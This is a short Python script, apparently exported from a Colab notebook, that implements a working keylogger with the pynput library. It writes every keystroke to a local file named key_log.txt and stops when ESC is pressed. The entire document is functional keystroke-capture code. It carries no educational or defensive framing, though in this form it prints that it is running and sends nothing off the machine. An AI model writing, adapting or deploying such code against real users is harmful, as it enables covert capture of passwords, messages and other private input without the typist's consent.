# -*- coding: utf-8 -*-
"""Untitled0.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1Wy0boQUG1RAJlZNZe7I8SEYflGsWTWnC
"""

# pip install pynput

from pynput import keyboard
import os

log_file = "key_log.txt"

# Create or clear the log file initially
with open(log_file, "w") as f:
    f.write("Keylogger Started\n")

def on_press(key):
    try:
        with open(log_file, "a") as f:
            f.write(f"{key.char}")
    except AttributeError:
        with open(log_file, "a") as f:
            f.write(f"[{key}]")

def on_release(key):
    if key == keyboard.Key.esc:
        print("\n[INFO] Stopping keylogger.")
        return False

# Start listening
with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
    print("[INFO] Keylogger is running. Press ESC to stop.")
    listener.join()